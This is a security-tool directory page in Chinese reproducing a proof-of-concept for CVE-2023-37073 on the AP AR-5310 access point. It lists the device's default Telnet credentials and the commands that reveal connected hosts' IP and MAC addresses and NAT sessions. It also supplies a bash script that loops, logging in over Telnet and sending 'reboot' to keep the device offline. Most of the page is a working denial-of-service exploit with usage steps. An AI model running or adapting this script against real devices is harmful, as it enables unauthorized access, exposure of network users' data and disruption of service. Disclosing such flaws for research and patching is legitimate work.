Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-37073 — Telnet默认凭据可能导致信息泄露和拒绝服务(DoS)攻击。 | Kitploit
工具/GitHubGitHub/hamza0x/cve-2023-37073
物联网安全密码攻击漏洞利用信息收集硬件与物联网安全
GitHubhamza0x/cve-2023-37073

CVE-2023-37073

Telnet默认凭据可能导致信息泄露和拒绝服务(DoS)攻击。

查看仓库
103年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-37073

Telnet 默认凭据可能导致信息泄露和拒绝服务 (DoS) 攻击。

复现步骤

此漏洞影响 AP AR-5310

  Telnet 192.168.1.1
  username:user
  password:user
  然后 Boom ... 你已登录 

通过 Telnet 默认凭据泄露信息

    当你通过 Telnet 服务登录后,
    输入命令 'help' 或 '?' 可查看
    可用选项:
    
    > reboot, ping, lanhosts, passwd
  
    > restoredefault, nslookup, traceroute
  
    > save, uptime, exitOnIdle, wan, version,
  
    > serialnumber, modelname, tr69cfg, nat

  要获取连接到网络的每个设备的 IP 和 MAC 地址,
  请运行命令 'lanhosts'。
  要显示通过接入点 (AP) 的所有 NAT 会话,
  请使用命令 'nat show session'

DoS 攻击

  要执行拒绝服务 (DoS) 攻击,
  请运行命令 'reboot' 重新启动 AP。
  我想编写一个脚本来自动化
  持续重启 AP 的操作。

通过 shell 脚本自动化 DoS 攻击

#!/bin/bash

# Telnet credentials
USER="user"
PASSWORD="user"
HOST="192.168.1.1"

# Function to check host availability
check_host_availability() {
    ping -c 1 -W 1 "$HOST" > /dev/null 2>&1
    return $?
}

# Loop to check host availability and execute Telnet command when available
while true; do
    if check_host_availability; then
        echo "Host $HOST is reachable. Initiating Telnet connection and reboot..."
        { sleep 1; echo "$USER"; sleep 1; echo "$PASSWORD"; sleep 1; echo "reboot"; sleep 1; } | telnet "$HOST"
    else
        echo "Host $HOST is not reachable. Retrying in 10 seconds..."
        sleep 10
    fi
done
下载工具